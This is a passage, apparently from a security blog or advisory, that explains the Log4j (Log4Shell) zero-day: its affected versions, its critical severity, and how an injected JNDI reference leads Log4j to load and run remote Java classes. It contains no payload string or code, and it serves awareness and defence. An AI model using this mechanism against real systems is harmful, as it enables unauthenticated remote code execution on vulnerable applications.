One of Santa’s (evil) helpers delivered a nasty early Christmas present on 9 December: a zero-day. The “Log4J” vulnerability was discovered by an Alibaba threat researcher and lies in a widely used open-source library. Read on for the gory details!
Versions 2 to 2.14.1 of the Apache Log4j library are vulnerable to a format string attack allowing an attacker to run arbitrary code on the system running the application. The reason why this vulnerability is worthy of its critical 10 CVSS3 score is down to two factors: opportunity and impact. Log4j is one of the most popular Java logging libraries, used in a plethora of enterprise applications, web services and open-source frameworks. Therefore, the number of potential targets a threat actor can exploit is high.
Unfortunately, the vulnerability is also trivial to exploit. An unauthenticated attacker simply needs to input a string containing a malicious Java Naming and Directory Interface (JNDI) reference into a vulnerable application that they know will be evaluated as a command by Log4j. At its heart, the vulnerability abuses a feature of JNDI that allows Log4j to run remotely hosted Java class